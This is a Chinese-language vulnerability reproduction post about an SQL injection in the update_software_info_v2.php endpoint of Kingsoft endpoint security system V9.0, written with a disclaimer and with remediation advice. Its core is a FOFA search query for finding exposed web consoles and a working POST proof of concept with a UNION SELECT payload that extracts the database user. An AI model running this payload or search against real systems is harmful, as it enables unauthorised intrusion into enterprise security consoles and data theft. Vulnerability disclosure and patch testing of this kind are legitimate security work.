文章目录
- 金山终端安全系统V9.0 update_software_info_v2.php处SQL注入漏洞复现 [附POC]
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响版本
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
- 0x06 修复建议
- 参考链接:
金山终端安全系统V9.0 update_software_info_v2.php处SQL注入漏洞复现 [附POC]
0x01 前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
0x02 漏洞描述
近期,长亭科技监测到猎鹰安全(原金山安全)官方发布了新版本修复了一处SQL注入漏洞。金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。
该漏洞是由于金山终端安全系统未对用户的输入进行有效地过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。
0x03 影响版本
金山终端安全系统<V9.SP1.E1008
0x04 漏洞环境
FOFA语法:title=“用户登录-金山终端安全系统V9.0Web控制台”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (POST)
POST /inter/update_software_info_v2.php HTTP/1.1
Host: ip:port
Content-Type: application/x-www-form-urlencoded
type=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=
3.复现
0x06 修复建议
升级修复方案:
官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。
https://www.ejinshan.net/lywz/index
临时缓解方案:
通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议,不要将集权设备的Web管理控制台开放在互联网上,并且仅允许可信IP进行访问。
参考链接:
https://mp.weixin.qq.com/s/Dd6BZglv6OYXveJOAvoawA